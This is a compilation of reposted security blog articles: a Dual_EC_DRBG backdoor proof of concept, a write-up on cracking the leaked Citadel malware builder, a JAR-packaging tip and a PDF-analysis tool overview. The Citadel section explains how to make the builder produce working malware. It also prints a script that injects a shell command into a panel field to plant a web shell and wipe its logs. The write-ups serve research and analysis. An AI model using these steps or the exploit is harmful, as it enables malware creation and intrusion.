Apple joined AOL, Yahoo, Twitter, Microsoft, LinkedIn, Google and Facebook in requesting global government surveillance reform with an open letter. Though the NSA is located in the United States and these programs were largely designed to target ‘foreign threats’, these companies have a global customer base — making protecting user privacy abroad as well as at home just as important. Image Credit: EFF Sursa: Apple Says It Has Never Worked With NSA To Create iPhone Backdoors, Is Unaware Of Alleged DROPOUTJEEP Snooping Program | TechCrunch
  19. [h=1]Dual_EC_DRBG backdoor: a proof of concept[/h] [h=2]What's this ?[/h] Dual_EC_DRBG is a pseudo-random number generator promoted by NIST in NIST SP 800-90A and created by the NSA. This algorithm is problematic because it has been made mandatory by the FIPS norm (and should be implemented in every FIPS approved software) and some vendors even promoted this algorithm as the first source of randomness in their applications. edit: I've been told it's not the case anymore in FIPS-140-2, but the cat is already out of the bag. If you still believe Dual_EC_DRBG was not backdoored on purpose, please keep reading. Already in 2007, Dan Shumow and Niels Ferguson from Microsoft showed that the Dual_EC_DRBG algorithm could be backdoored. Twitter also recently uncovered that this algorithm was even patented in 2004 by Dan Brown (not the Da Vinci guy, the Certicom one) as a "key escrow mechanism" (government jargon for trapdoor/backdoor). I will go a little bit further in explaining how it works and give proof-of-concept code, based on OpenSSL FIPS. To the best of my knowledge, this is the only public proof of concept published today (correct me if I'm wrong). [h=2]Dual_EC_DRBG in a nutshell[/h] The PRNG works as follows: it takes a seed that goes through a hashing algorithm. This data is then "fed" into two Elliptic Curve points, P and Q, before being slightly transformed and output. In order to understand how the algorithm (and the backdoor) works, let's see the relevant maths from Elliptic Curves: [h=3]Elliptic curves[/h] Many types of elliptic curves exist. They are classified according to their properties and equations. We're going to look here at the curve NIST-p256, which is one of the three curves used by Dual_EC_DRBG. NIST-p384 and NIST-p521 have very similar characteristics. I'll try to (poorly) give you the basic theory of EC, but I'm no mathematician. Please forgive me and correct me if I'm wrong. A curve is a set of points that follow a group structure. The curve is defined by several parameters (for NIST GFp curves): Equation: all the members of that group (called points) must satisfy this equation (y^2 = x^3 + ax + b mod p). Prime modulus p: a prime number used to define the finite field Z/pZ in which the equation elements are defined. The order r: this is the order of the EC and the total number of points in the group. a and b: fixed integers used in the curve's equation. a is set to -3 in NIST GF(p) curves. A Generator point defined by Gx and Gy: this point is considered the base element of the group. Curve members are points. A point is a pair of coordinates X and Y that satisfy the curve's equation. They are written as capital letters such as G, P or Q. Points have some characteristics from groups: They have an addition operation (+) defined between two points (e.g. P + Q). This addition is commutative and associative. Since you can add a point to itself as many times as you want, there is also a scalar multiplication, which is the multiplication of a scalar (0..n) with a point and results in another point. That scalar multiplication is associative/commutative (a(bP) = b(aP)). This scalar should be in the group of integers modulo r (the order of the curve). The group of Elliptic Curves is very useful in cryptography, because an equation such as iQ = P is very easy to resolve for Q or P (if you know i) but very hard to resolve for i (if all you know is P and Q). This is the Discrete Logarithm Problem in the EC group. 
That's why most of the time the points are used as public parameters/keys and scalars as private counterparts. All NIST curves have different parameters p, r, a, b and points G. These parameters have been constructed from a SHA-1 hash of a public seed, but nobody knows how the seed itself has been chosen. Enough on the theory, let's study the PRNG ! [h=2]Dual_EC_DRBG internals[/h] Dual_EC_DRBG is defined in NIST SP800-90A page 60. It is an algorithm generating an infinite number of pseudo-random sequences from a single seed, taken in the first step or after an explicit reseed. It is unfortunate that SP800-90A and the presentation from Microsoft use conflicting terminology (variable names). So I will use these variables: s: the internal seed value. r: the external (output) value. You can also see in the document two functions: phi and x(). phi is a function that does a mapping between a large integer and binary data. It doesn't do much, in fact we can happily ignore it. x(A) simply gets the X coordinate of the point A, as the X and Y coordinates are mostly redundant (as we're going to see later). If we unroll the inductive feedback loop on the first two generated outputs, we get this: s1 = phi(x(s0 * P)); r1 = phi(x(s1 * Q)); output(30 least significant bytes of r1); s2 = phi(x(s1 * P)); r2 = phi(x(s2 * Q)); output(30 least significant bytes of r2). [h=2]An attack[/h] Let's begin working on r1 and see if we can guess the internal state from its content. We can see that r1 is the X coordinate of a point, with 16 bits missing (we lost the 2 most significant bytes in the output process). In a NIST GFp curve there are, for every value of X, zero, one or two points on the curve. So we have at most 17 bits of bruteforce to do to recover the original point A. Let's work on the hypothesis that we know the point A and that it is equal (by definition) to A = s1 * Q. If we have a (secret) relation between P and Q such as P = d * Q, with d = a secret number (our backdoor !), then multiplying each side by d (and replacing d * Q with P) gives: d * A = d * s1 * Q = s1 * P. If you look carefully at the unrolled algorithm, you will notice that if we know s1 * P we can calculate s2 = phi(x(s1 * P)), and then we have all the required information to calculate the subsequent s and r values. All we need to do is to guess a value of A (based on a bruteforce approach), multiply it by the secret value d, take the X coordinate, then multiply Q by the resulting scalar, strip two bytes and publish the output. It is also very interesting that if we learn (in a practical attack) the first 32 bytes generated by this PRNG, the first 30 bytes give us candidates for A and the remaining two bytes can be used to validate our findings. If the X value had been output on 32 bytes, we would have a one-in-two chance of success because of the two coexisting points on the same coordinate X. (Remember from high school, second degree equations can have two solutions.) [h=2]Generating the constants[/h] As you have seen before, for our backdoor to work we need to choose the P and Q points in order to have the secret key to the backdoor. We would like to define P = d * Q; however, that can't work directly, because P is a generator for the EC group and its value has already been fixed. So, we have to find a value e such that Q = e * P. This value can be calculated: substituting Q = e * P into P = d * Q gives P = d * e * P (mult. by e), so we need a value e such that e * d = 1 for the curve C. The equation to resolve is e * d = 1 (mod r), where r is the order of the EC. The value of e is the inverse of d modulo r. We can then use that value to generate Q. 
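Before looking at the code, here is the whole backdoor argument collected in one place. This is my own summary of the relations reconstructed above, written in LaTeX notation:

\[ s_i = \varphi(x(s_{i-1} \cdot P)), \qquad r_i = \varphi(x(s_i \cdot Q)), \qquad \text{output}_i = \text{30 least significant bytes of } r_i \]
\[ A = s_1 \cdot Q, \qquad P = d \cdot Q \;\Longrightarrow\; d \cdot A = d \cdot s_1 \cdot Q = s_1 \cdot P \;\Longrightarrow\; s_2 = \varphi(x(d \cdot A)) \]
\[ Q = e \cdot P \text{ with } e \cdot d \equiv 1 \pmod{r} \;\Longrightarrow\; d \cdot Q = P \]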
/* 256 bits value randomly generated */
unsigned char d[]=
    "\x75\x91\x67\x64\xbe\x30\xbe\x85\xd1\x50\x09\x19\x50\x8a\xf4\xb5"
    "\x7a\xc7\x09\x22\x07\x32\xae\x40\xac\x3e\xd5\xfe\x2e\x12\x25\x2a";
d_bn = BN_new();
assert(d_bn != NULL);
BN_bin2bn(d, 32, d_bn);
/* ensure d is well inside the group order */
EC_GROUP_get_order(curve, r, bn_ctx);
BN_mod(d_bn, d_bn, r, bn_ctx);
/* calculate Q = d * Generator + (NULL * NULL) */
ret = EC_POINT_mul(curve, my_Q, d_bn, NULL, NULL, bn_ctx);
assert(ret == 1);
/* calculate e = d^-1 (mod r) */
e_bn = BN_new();
assert(e_bn != NULL);
/* invert d to get the value of e */
assert(NULL != BN_mod_inverse(e_bn, d_bn, r, bn_ctx));
(note: I know I mixed up e with d between the code and the blog post, but that doesn't change anything at all.) [h=2]Implementation[/h] You can find the proof of concept code on my github. I'll explain how it works: [h=3]Install OpenSSL/FIPS[/h] Most of the work needed for this POC was actually fighting with OpenSSL FIPS mode (getting it to compile at first) and finding the right APIs to use. OpenSSL FIPS and OpenSSL are two different pieces of software that share some of their codebase. I had to fetch a specific commit of OpenSSL FIPS (one that would compile) and patch it a little to have a few functions from Bignums usable from inside my application. I haven't been able to mix FIPS and regular libcrypto, because of header incompatibilities (or a bug in my code I thought was caused by incompatibilities). The README explains the steps to take (please read it). [h=3]Recover point A[/h] If you remember, we have the 30 least significant bytes of the X coordinate; that means we need to bruteforce our way through the candidate points A. This can easily be done in a loop over the 2^16 possibilities. OpenSSL doesn't provide any way of recovering a point from a single coordinate (there exists a point compression algorithm, but it is so badly patented that it's not implemented anywhere). We have to resolve the curve's equation y^2 = x^3 - 3x + b (mod p) for y, which is not so different from the equation solving you learned at high school:
for (prefix = 0; prefix <= 0x10000 ; ++prefix){
    x_bin[0] = prefix >> 8;
    x_bin[1] = prefix & 0xff;
    BN_bin2bn(x_bin, 32, x_value);
    //bnprint("X value", x_value);
    /* try to find y such as */
    /* y^2 = x^3 - 3x + b (mod p) */
    /* tmp1 = x^2 */
    ret = BN_mod_mul(tmp1, x_value, x_value, &curve->field, bn_ctx);
    assert(ret == 1);
    ret = BN_set_word(tmp2, 3);
    assert(ret == 1);
    /* tmp1 = x^2 - 3 */
    ret = BN_mod_sub(tmp1, tmp1, tmp2, &curve->field, bn_ctx);
    assert(ret == 1);
    /* tmp1 = (x^2 -3) * x */
    ret = BN_mod_mul(tmp1, x_value, tmp1, &curve->field, bn_ctx);
    assert(ret == 1);
    /* tmp1 = x^3 - 3x + b */
    ret = BN_mod_add(tmp1, tmp1, b_bn, &curve->field, bn_ctx);
    assert(ret == 1);
    //bnprint("Y squared", tmp1);
    if (NULL != BN_mod_sqrt(y_value, tmp1, &curve->field, bn_ctx)) {
        //printf("value %x match !\n", prefix);
        if(verbose)
            bnprint("calculated Y", y_value);
        BN_mod_sub(y_value, zero_value, y_value, &curve->field, bn_ctx);
        if(verbose)
            bnprint("calculated Y opposite", y_value);
        test_candidate(buffer + 30, x_value, y_value, bn_ctx);
        valid_points += 2;
    }
}
I mentioned that for every X there are zero, one or two solutions: zero if the square root fails (not all elements of Z/pZ are quadratic residues), one if the result is 0, and two for all other answers. There are then two valid points, (x, y) and (x, -y), where -y is the opposite of the first value modulo p. Explanation (thanks Rod): [h=3]Recover PRNG state and generate next block[/h] This part is pretty straightforward. 
We import the estimated x and y values, verify that they are on the curve (they should be !), then multiply that point by the secret value. We then multiply Q by the resulting scalar and we get 30 bytes of the next output. If the first two bytes match, we have successfully guessed the 28 remaining bytes. That attack can recover everything that's output by that PRNG until a reseed.
/* create the point A based on calculated coordinates x and y */
ret = EC_POINT_set_affine_coordinates_GFp(curve, point, x, y, bn_ctx);
assert(ret == 1);
/* Normally the point should be on curve but we never know */
if (!EC_POINT_is_on_curve(curve, point, bn_ctx))
    goto end;
/* calculates i2 = phi(x(e.A)) */
ret = EC_POINT_mul(curve, point, NULL, point, e_bn, bn_ctx);
assert(ret == 1);
ret = EC_POINT_get_affine_coordinates_GFp(curve, point, i2x, NULL, bn_ctx);
assert(ret == 1);
if(verbose)
    bnprint("i2_x", i2x);
/* calculate o1 = phi(x(i2 * Q)) */
ret = EC_POINT_mul(curve, point, NULL, my_Q, i2x, bn_ctx);
assert(ret == 1);
ret = EC_POINT_get_affine_coordinates_GFp(curve, point, o1x, NULL, bn_ctx);
if(verbose)
    bnprint("o1_x", o1x);
BN_bn2bin(o1x, o1x_bin);
if (o1x_bin[2] == buffer[0] && o1x_bin[3] == buffer[1]){
    printf("Found a match !\n");
    bnprint("A_x", x);
    bnprint("A_y", y);
    print_hex("prediction", o1x_bin + 4, 28);
}
[h=3]Let's run it ![/h]
aris@kalix86:~/dualec$ ./dual_ec_drbg_poc
s at start of generate: E9B8FBCFCDC7BCB091D14A41A95AD68966AC18879ECC27519403B34231916485
[omitted: many output from openssl]
y coordinate at end of mul: 0663BC78276A258D2F422BE407F881AA51B8D2D82ECE31481DB69DFBC6C4D010
r in generate is: 96E8EBC0D507C39F3B5ED8C96E789CC3E6861E1DDFB9D4170D3D5FF68E242437
Random bits written: 000000000000000000000000000000000000000000000000000000000000
y coordinate at end of mul: 5F49D75753F59EA996774DD75E17D730051F93F6C4EB65951DED75A8FCD5D429
s in generate: C64EAF10729061418EB280CCB288AD9D14707E005655FDD2277FC76EC173125E
[omitted: many output from openssl]
PRNG output: ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437449e
Found a match !
A_x: 96e8ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437
A_y: 0663bc78276a258d2f422be407f881aa51b8d2d82ece31481db69dfbc6c4d010
prediction: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3
Reviewed 65502 valid points (candidates for A)
PRNG output: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3
Yikes ! [h=2]Conclusion[/h] It is quite obvious, in light of the recent revelations from Snowden, that this weakness was introduced on purpose by the NSA. It is very elegant and leaks its complete internal state in only 32 bytes of output, which is very impressive knowing it takes 32 bytes of input as a seed. It is obviously complete madness to use the reference implementation from NIST and I'm not the only one to be angry about it. You could use it with custom P and Q values, but that's very seldom possible. Nevertheless, having a whole EC point parameter leaked in the output makes it too easy to distinguish from real randomness, and it should never have been made into any specs at all. Let's all bury that PRNG and the "security" companies bribed by the NSA to enable backdoors by default for thirty silver coins. edits: fixed Dan Brown's employer name, changed a variable name to avoid confusion, fixed counting error 28 bytes to 30 bytes note: I did not break the official algorithm. I do not know the secret value used to compute the Q constant, and thus cannot break the default implementation. 
Only the NSA (and people with access to the key) can exploit the PRNG weakness. Source: Dual_Ec_Drbg backdoor: a proof of concept at Aris' Blog - Computers, ssh and rock'n roll
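For readers who want to play with the relation without building the OpenSSL FIPS PoC, here is a small independent sketch in Python using the third-party ecdsa package for the P-256 arithmetic. It is not the author's code: the secret d and the seed are made-up placeholders, and the 16-bit brute force plus square-root step is skipped (the attacker is simply handed the full point A).

# Minimal sketch of the Dual_EC_DRBG backdoor relation (not the article's PoC).
# Requires the third-party "ecdsa" package and Python 3.8+ (for pow(d, -1, r)).
from ecdsa import NIST256p

curve = NIST256p
P = curve.generator            # P is the standard P-256 generator, as in the PoC
r = curve.order
d = 0x123456789ABCDEF          # attacker-chosen secret (placeholder value)
e = pow(d, -1, r)              # e = d^-1 mod r, so that d*Q = P
Q = P * e                      # the "backdoored" second point

def step(s):
    """One Dual_EC_DRBG round: returns (next state, 30-byte output)."""
    s_next = (P * s).x()                              # s_{i+1} = x(s_i * P)
    r_out = (Q * s_next).x()                          # r_{i+1} = x(s_{i+1} * Q)
    return s_next, r_out.to_bytes(32, "big")[2:]      # drop the top 2 bytes

def attacker_predict(A):
    """Given the full point A with x(A) = r_1, predict the next 30 output bytes."""
    s2 = (A * d).x()                                  # d*A = s_1 * P, so x(d*A) = s_2
    return (Q * s2).x().to_bytes(32, "big")[2:]

s0 = 0xDEADBEEF                                       # toy seed (placeholder)
s1, out1 = step(s0)
s2, out2 = step(s1)

# In a real attack, A is recovered from out1 by brute-forcing the missing 16 bits
# and solving the curve equation; here we simply hand it to the attacker.
A = Q * s1
assert attacker_predict(A) == out2
print("predicted next output:", out2.hex())

The point of the sketch is the same as the article's: anyone who knows d can turn one output block into the full internal state and predict everything that follows.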
  20. [h=3]How the protection of Citadel got cracked[/h] Recently on a forum someone requested cbcs.exe (Citadel Backconnect Server). If you want to read more about the Backconnect feature in Citadel, the link that g4m372 shared is cool: Laboratorio Malware: Troyan Citadel BackConnect VNC Server Manager I searched for this file by downloading a random mirror of the leaked Citadel package, in the hope of finding it inside. In the end the file wasn't in the leaked archive, but it had already been grabbed by various malware trackers. MD5: 50A59E805EEB228D44F6C08E4B786D1E Malwarebytes: Backdoor.Citadel.BkCnct And since I've downloaded the leaked Citadel package... let's have a look at the Builder. It can be interesting to make a post about it. Citadel.exe: a33fb3c7884050642202e39cd7f177e0 Malwarebytes: Hacktool.Citadel.Builder "ERROR: Builder has been moved to another PC or virtual environment, now it is deactivated." This file is packed with UPX: Same for the Citadel Backconnect Server and the Hardware ID generator. But when we try to unpack it via UPX we get an exception: UPX tells us that there is something wrong with the file header; aquabox used a lame trick. With a hexadecimal editor we can clearly see that there is a problem with the DOS header: We have 0x4D 0x5A ... 00 ... and a size of 0xE8 for the memory. e_lfanew is null, so let's fix it at 18h by 0x40. Miracle: The same trick applies to the Hardware ID Calculator and the Citadel Backconnect Server; I will get back to these two files later. Now that we have clear code we can see the Time/Date Stamp, view the resources, and, more interestingly, see how Citadel is protected. Viewing the strings already gives us a good insight: PHYSICALDRIVE0, Win32_BIOS, Win32_Processor, SerialNumber... (see the sketch at the end of this post) But we don't even really need to waste time trying to work out how the generation is done, although you can put a breakpoint at the beginning of the calculation procedure (0x4013F2). At the end, you will be here; this routine finalises your HID: From another side, you can also have a look at the Hardware ID Calculator. I had a problem with this file: the first layer was a SFX archive: Malware embedded (stealer): Conclusion: Don't rush on leaked stuff. Alright, now that you have extracted/unpacked the good HID Calculator you can open it in Olly. The code is exactly the same as the one you can find in the Citadel Builder, so it may help to locate the calculation procedure in the builder, although it's really easy to locate anyway. That was just a short parenthesis; to get back to the builder, after the generation ends you will have multiple occasions to view your HID on the stack, like here: And the crucial part starts here. When the Citadel package of Citab got leaked (see this article for more information), an important file was also released: the HID of the original machine that was running the builder. So you just have to replace your HID with this one, just like this: And this is how the protection of Citadel becomes super weak and the builder can generate working malware. Now you just have to do a codecave or inject a DLL in order to modify it permanently; child's play. The problem that every cracker was facing on leaked Citadel builders is finding the right HID key. Citadel builders that were previously leaked did not come with an HID key, e.g.: vortex1772_second - 1.3.5.1 And you can't just 'force' the procedure to generate a bot, because the Citadel stub is encrypted inside; that's why, when the package got leaked with the correct HID, an easy way to crack the builder appeared. 
Without the right HID you can still bruteforce it until you break the key, but that is much harder and time-consuming; it would also be a greater achievement and more respected as a scene release.

To finish, let's get back to the Citadel backconnect server that was requested on kernelmode.info. This script was also leaked with the Citab package. It's for a Windows box, and it's super secure... oh wait:

import urllib
import urllib2

def request(url, params=None, method='GET'):
    if method == 'POST':
        urllib2.urlopen(url, urllib.urlencode(params)).read()
    elif method == 'GET':
        if params == None:
            urllib2.urlopen(url)
        else:
            urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()

def uploadShell(url, filename, payload):
    data = {
        'b' : 'tapz',
        'p1' : 'faggot',
        'p2' : 'hacker | echo "' + payload + '" >> ' + filename
    }
    request(url + 'test.php', data)

def shellExists(url):
    return urllib.urlopen(url).getcode() == 200

def cleanLogs(url):
    delete = { 'delete' : '' }
    request(URL + 'control.php', delete, 'POST')

URL = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD = '<?php phpinfo(); ?>'

uploadShell(URL, FILENAME, PAYLOAD)
print '[~] Shell created!'

if not shellExists(URL + FILENAME):
    print '[-]', FILENAME, 'not found...'
else:
    print '[+] Go to:', URL + FILENAME

cleanLogs(URL)
print '[~] Logs cleaned!'

Brief: happy new year, guys!

Posted by Steven K at 14:28
Sursa: XyliBox: How the protection of Citadel got cracked
  21. [h=1]How to make a JAR file Linux executable[/h] Every Java programmer knows - or should know - that it is possible to create a runnable Java archive (JAR), so that in order to launch an application it is enough to specify the jar file name on the Java interpreter command line along with the -jar parameter. For example:

$ java -jar helloworld.jar

There are plenty of tutorials showing how to implement this feature using Ant, Maven, Eclipse, NetBeans, etc. Anyway, in its basic form it just requires adding a MANIFEST.MF file to the jar package. The manifest must contain a Main-Class entry that specifies which class defines the main method for your application. For example:

$ javac HelloWorld.java
$ echo Main-Class: HelloWorld > MANIFEST.MF
$ jar -cvmf MANIFEST.MF helloworld.jar HelloWorld.class

But this still requires your users to invoke the Java interpreter with the -jar option. There are many reasons why it would be preferable to have your app runnable by simply invoking it on the terminal shell like any other command. Here comes the protip!

This technique is based on the ability to append a generic binary payload to a Linux shell script. Read more about this here: Add a Binary Payload to your Shell Scripts | Linux Journal

Taking advantage of this possibility, the trick is simply to embed a runnable jar file into a Bash script file. When executed, the script launches the Java interpreter specifying itself as the jar to run. Too complex? Much easier to do in practice than to explain!

Let's say that you have a runnable jar named helloworld.jar. Copy the Bash script below to a file named stub.sh:

#!/bin/sh
MYSELF=`which "$0" 2>/dev/null`
[ $? -gt 0 -a -f "$0" ] && MYSELF="./$0"
java=java
if test -n "$JAVA_HOME"; then
    java="$JAVA_HOME/bin/java"
fi
exec "$java" $java_args -jar $MYSELF "$@"
exit 1

Then append the jar file to the saved script and grant the execute permission to the resulting file with the following command:

cat stub.sh helloworld.jar > helloworld.run && chmod +x helloworld.run

That's all! Now you can execute the app just by typing helloworld.run on your shell terminal. The script is smart enough to pass any command line parameters to the Java application transparently. Cool, isn't it?!

In case you are a Windows guy, this obviously will not work (unless you run a Linux compatibility layer like Cygwin). Anyway, there exist tools that are able to wrap a Java application into a native Windows .exe binary file, producing a result similar to the one explained in this tutorial. See for example Launch4j - Cross-platform Java executable wrapper

Sursa: https://coderwall.com/p/ssuaxa
  22. [h=3]AnalyzePDF - Bringing the Dirt Up to the Surface[/h]

[h=2]What is that thing they call a PDF?[/h] The Portable Document Format (PDF) is an old format ... it was created by Adobe back in 1993 as an open standard but wasn't officially released as an open standard (ISO 32000-1) until 2008 - right @nullandnull ? I can't take credit for the nickname that I call it today, Payload Delivery Format, but I think it's clever and applicable enough to mention. I did a lot of painful reading through the PDF specifications in the past and if you happen to do the same I'm sure you'll also have a lot of "hm, that's interesting" thoughts as well as many "wtf, why?" thoughts. I truly encourage you to go out and do the same... it's a great way to learn about the internals of something, what to expect and what would be abnormal.

The PDF has become a de facto format for transferring files, presentations, whitepapers etc. <rant> How about we stop releasing research/whitepapers about PDF 0-days/exploits via a PDF file... seems a bit backwards</rant> We've all had those instances where you wonder if that file is malicious or benign ... do you trust the sender, or was it downloaded from the Internet? Do you open it or not? We might be a bit more paranoid than most people when it comes to this type of thing, but since PDF's are so common they're still a reliable delivery method for malicious actors. As the PDF contains many 'features', these features often turn into 'vulnerabilities' (do we really need to embed an exe into our PDF? or play a SWF game?). Good thing it doesn't contain any vulnerabilities, right? (To be fair, the sandboxed versions and other security controls these days have helped significantly.) Adobe Acrobat Reader : CVE security vulnerabilities, versions and detailed reports

[h=3]What does a PDF consist of?[/h] In its most basic form, a PDF consists of four components: header, body, cross-reference table (Xref) and trailer: (sick M$ Paint skillz, I know) If we create a simple PDF (this example only contains a single word) we can get a better idea of the contents we'd expect to see:

[h=2]What else is out there?[/h] Since PDF files are so common these days there's no shortage of tools to rip them apart and analyze them. Some of the information contained in this post and within the code I'm releasing may overlap with others out there, but that's mainly because our research produced similar results or our minds think alike... I'm not going to touch on every tool out there, but there are some worth mentioning because I either still use them in my analysis process or because some of their functionality (or lack thereof) is what sparked me to write AnalyzePDF. By mentioning the tools below my intention isn't to downplay them or their ability to analyze PDF's, but rather to help show the reasons I ended up doing what I did.

[h=4]pdfid/pdf-parser[/h] Didier Stevens created some of the first analysis tools in this space, which I'm sure you're already aware of. Since they're already bundled into distros like BackTrack/REMnux they seem like good candidates to leverage for this task. Why recreate something if it's already out there? Like some of the other tools, they parse the file structure and present the data to you... but it's up to you to interpret that data. Because these tools are commonly available on distros and get the job done, I decided they were the best to wrap around.
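To give a concrete idea of what "wrapping around" pdfid can look like, here is a minimal sketch (mine, not the AnalyzePDF code). It assumes pdfid.py is on the PATH and prints its usual keyword/count lines; the regex and script name are illustrative only.

import re
import subprocess
import sys

def run_pdfid(pdf_path):
    # Shell out to pdfid and turn its "  /Keyword   N" lines into a dict.
    out = subprocess.check_output(['pdfid.py', pdf_path])
    counts = {}
    for line in out.decode('utf-8', 'replace').splitlines():
        m = re.match(r'^\s*(/?\w[\w#]*)\s+(\d+)\s*$', line)
        if m:
            counts[m.group(1)] = int(m.group(2))
    return counts

if __name__ == '__main__':
    for keyword, count in sorted(run_pdfid(sys.argv[1]).items()):
        print('%-20s %d' % (keyword, count))

From a dictionary like this it becomes trivial to start asking questions such as "is /JS present?" or "does the obj count match endobj?", which is essentially what the rest of this post builds on.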
Did you know that pdfid has a lot more capabilities/features than most people are aware of? If you run it with the (-h) switch you'll see some other useful options, such as (-e), which displays extra information. Of particular note here is the mention of "%%EOF", "After last %%EOF", create/mod dates and the entropy calculations.

During my data gathering I encountered a few hiccups that I hadn't previously experienced. This is expected, as I was testing a large data set of who knows what kind of PDF's. Again, I'm not noting these to put down anyone's tools, but I feel it's important to be aware of the capabilities and limitations of something - and also in case anyone else runs into something similar, so they have a reference. Because of some of these, I am including a slightly modified version of pdfid as well. I haven't tested whether the newer version fixed anything, so I'd rather give everyone the files that I know work with it.
[*]I first experienced a similar error as mentioned here when using the (-e) option on a few files (e.g. cbf76a32de0738fea7073b3d4b3f1d60). It appears it doesn't count multiple '%%EOF's: if the '%%EOF' is the last thing in the file without a '\r' or '\n' behind it, it doesn't seem to count it.
[*]I've had cases where the '/Pages' count was incorrect - there were (15) PDF's that showed '0' pages during my tests. One way I tried to get around this was to use the (-a) option and compare the '/Page' and '/Pages' values (e.g. ac0487e8eae9b2323d4304eaa4a2fdfce4c94131).
[*]There were times when the number of characters after the last '%%EOF' was incorrect.
[*]It won't flag on JavaScript if it's written like "<script contentType="application/x-javascript">" (e.g. cbf76a32de0738fea7073b3d4b3f1d60):

[h=4]peepdf[/h] Peepdf has gone through some great development over the course of me using it and definitely provides some great features to aid your analysis process. It has some intelligence built in to flag on things and also allows you to decode things like JavaScript from the current shell. Even though it has a batch/automated mode, it still feels more like a tool I want to use to analyze a single PDF at a time and dig deep into the file's internals. Originally this tool didn't match keywords if they had spaces after them, but it was a quick and easy fix... glad this testing could help improve another user's work.

[h=4]PDFStreamDumper[/h] PDFStreamDumper is a great tool with many sweet features, but it has its uses and limitations like all things. It's a GUI built for analysis on Windows systems, which is fine, but its power comes from analyzing a single PDF at a time - and again, it's still mostly a manual process.

[h=4]pdfxray/pdfxray_lite[/h] Pdfxray was originally an online tool, but Brandon created a lite version so it could be included in REMnux (it used to be publicly accessible, but at the time of writing that looks like it might have changed). If you look back at some of Brandon's work he's done a lot in this space as well, and since I encountered some issues with other tools and noticed he did too in the past, I know he's definitely dug deep and used that knowledge for his tools. Pdfxray_lite can query VirusTotal for the file's hash and produce a nice HTML report of the file's structure - which is great if you want to include that in an overall report, but again it requires the user to interpret the parsed data.

[h=4]pdfcop[/h] Pdfcop is part of the Origami framework.
There are some really cool tools within this framework, but I liked the idea of analyzing a PDF file and alerting on badness. This particular tool in the framework has that ability; however, I noticed that if it flagged on one cause it wouldn't continue analyzing the rest of the file for other things of interest (e.g. I've had it close the file out right away because of an invalid Xref without looking at anything else. This is because PDF's are read from the bottom up, meaning their Xref tables are read first in order to determine where to go next). I can see the argument of "why continue to analyze the file if it was already flagged as bad", but that feels like too much tunnel vision to me. I personally prefer to know more rather than less... especially if I want to do trending/stats/analytics.

[h=2]So why create something new?[/h] While there is a wealth of PDF analysis tools these days, there was a noticeable gap: tools with some intelligence built into them to help automate certain checks or alert on badness. In fairness, some (try to) detect exploits based on keywords or flag suspicious objects based on their contents/names, but that's generally the extent of it. I use a lot of the above mentioned tools when I'm handed a file and someone wants to know if it's malicious or not... but what about when I'm not around? What if I'm focused on something else at the moment? What if there are way too many files for me to manually go through each one? Those are the kinds of questions I had to address, and as a result I felt I needed to create something new. Not necessarily write something from scratch... I mean, why waste that time if I can leverage other things out there and tweak them to fit my needs?

[h=3]Thought Process[/h] What do people typically do when trying to determine if a PDF file is benign or malicious? Maybe scan it with A/V and hope something triggers, run it through a sandbox and hope the right conditions are met to trigger, or take the files one at a time through one of the above mentioned tools? Those are all fine workflows, but what if you discover something unique, or come across it enough times to create a signature/rule out of it so you can trigger on it in the future? We tend to have a lot to remember, so doing the analysis as one-offs may result in us forgetting something we previously discovered. Additionally, this doesn't scale too well in the sense that everyone on your team might not have the same knowledge that you do... so we need some consistency/intelligence built in to try and compensate for these things.

I felt it was better to use the characteristics of a malicious file (either known, or observed from combinations within malicious files) to evaluate what would indicate a malicious file, instead of just adding points for every questionable attribute observed. E.g. instead of adding a point for being a one page PDF, make a condition that says: if you see an invalid xref and a one page PDF, then give it a score of X. This makes the conditions more accurate in my eyes since, for example, a single page PDF by itself isn't malicious, but if it also contains other questionable things then it should be weighted more heavily towards being malicious. Another example is JavaScript within a PDF. While statistics show JavaScript within a PDF is a high indicator that it's malicious, there are still legitimate reasons for JavaScript to be within a PDF (e.g.
- to calculate a purchase order form or to verify that you correctly entered all the information the PDF requires).

[h=3]Gathering Stats[/h] At the time I was performing my PDF research and deciding how to tackle this task I wasn't really aware of machine learning. I feel that would be a better path to take in the future, but the way I gathered my stats/data was similar, just less automated. There's no shortage of PDF's out there, which is good for us as it helps determine what's normal, malicious, or questionable, and lets us leverage that intelligence within a tool. If you need some PDF's to gather stats on, contagio has a pretty big bundle to help get you started. Another resource is Govdocs from Digital Corpora ... or a simple Google dork. Note: spidering/downloading these will give you files, but they still need to be classified as good/bad for initial testing. Be aware that you're going to come across files that someone marked as good but that actually show signs of badness... always interesting to detect these types of things during testing!

[h=4]Stat Gathering Process[/h] So now that I have a large set of files, what do I do? I can't just rely on their file extensions or on someone else saying they're malicious or benign, so how about something like this:

[*]Verify it's a PDF file. When reading through the PDF specs I noticed that the PDF header can be within the first 1024 bytes of the file, as stated in 3.4.1, 'File Header' of Appendix H: 'Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file.'... that's a long way down compared to the traditional header, which is usually right at the beginning of a file. So what does that mean for us? Well, if we rely solely on something like file or TRiD they _might_ not properly identify/classify a PDF that has the header that far into the file, as most only look within the first 8 bytes (unfair example is from corkami). We can compensate for this within our code, create a YARA rule, etc. (a minimal sketch of such a check is shown a bit further down). You don't believe me, you say? Fair enough, I don't believe things unless I try them myself either: the file to the left is properly identified as a PDF file, but when I created a copy of it and modified it so the header was a bit lower, the tools failed. The PDF on the right is still in accordance with the PDF specs and PDF viewers will still open it (as shown)... so this needs to be taken into consideration.
[*]Get rid of duplicates (based on SHA256 hash), first within each category (clean vs. dirty) and then again across the entire data set to make sure there are no duplicates between the clean and dirty sets.
[*]Run pdfid & pdfinfo over the file to parse out their data. These two are already included in REMnux so I leveraged them. You can swap in other tools, but this made it flexible for me and I knew the tool would work when run on this distro; pdfinfo parsed some of the data better during tests, so getting the best of both seemed like the right approach.
[*]Run scans for low hanging fruit/known badness with local A/V or YARA.

Now that we have a more accurately classified data set:
[*]Are all PDFs classified as benign really benign?
[*]Are all PDFs classified as malicious really malicious?
